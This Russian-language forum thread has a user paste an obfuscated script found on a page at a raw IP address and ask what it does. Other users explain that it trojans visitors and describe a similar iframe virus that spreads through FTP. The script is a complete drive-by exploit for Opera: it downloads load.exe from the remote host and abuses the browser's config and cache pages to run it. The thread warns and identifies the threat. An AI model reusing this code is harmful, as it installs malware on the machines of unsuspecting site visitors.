СКрипт

[felix_]

Доброго времени суток!
Зашёл на сайт alphaekb.ru, меня привело на _ttp://79.135.166.138/st/index.php, и там увидел такой скрипт...

<script>
blank_iframe = document.createElement('if'+'ra'+'me');
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');
document.appendChild(blank_iframe);
blank_iframe_window.eval
	("config_iframe = document.createElement('if'+'ra'+'me');\
	config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\
	config_iframe.src = 'op'+'era:c'+'on'+'fig';\
	document.appendChild(config_iframe);\
	app_iframe = document.createElement('sc'+'ri'+'pt');\
	cache_iframe = document.createElement('if'+'ra'+'me');\
	app_iframe.src = '_ttp://79.135.166.138/st/load.exe';\
	app_iframe.onload = function ()\
	{\
		cache_iframe.src = 'op'+'er'+'a:c'+'ache';\
		cache_iframe.onload = function ()\
		{\
			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
			filename = cache.match(re);\
			config_iframe_window.eval\
			(\"\
			opera.setPreference('Ne'+'tw'+'ork','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
			app_link = document.createElement('a');\
			app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\
			app_link.click();\
			setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\
			\");\
		};\
		document.appendChild(cache_iframe);\
	};\
	document.appendChild(app_iframe);");
</script>

что он делает ?

 

[Wiltner]

Он подгружает ифреймом загрузку для дальнейшего протроянивания зашедшего на сайт юзера.

 

[itex]

Можно вирусологам послать файл 79.135.166.138/st/load.exe, если хотете сделать плохо владельцам сплоита.

 

[Rastafan]

У меня Касперский ловит аналогичный ифреймовский вирус. Не знаю на сколько он там безобидный, но если у вас есть доступ на ФТП к своим сайтам то он залазит к вам на сайт и добавляет аналогичный ифрейм в index.html, index.htm и index.php файлы. Соответсвенно теперь и ваш сайт будет распространять этот вирус. Так что будьте бдительны, я уже пару недель не могу вычистить все мои хостинги от вируса ...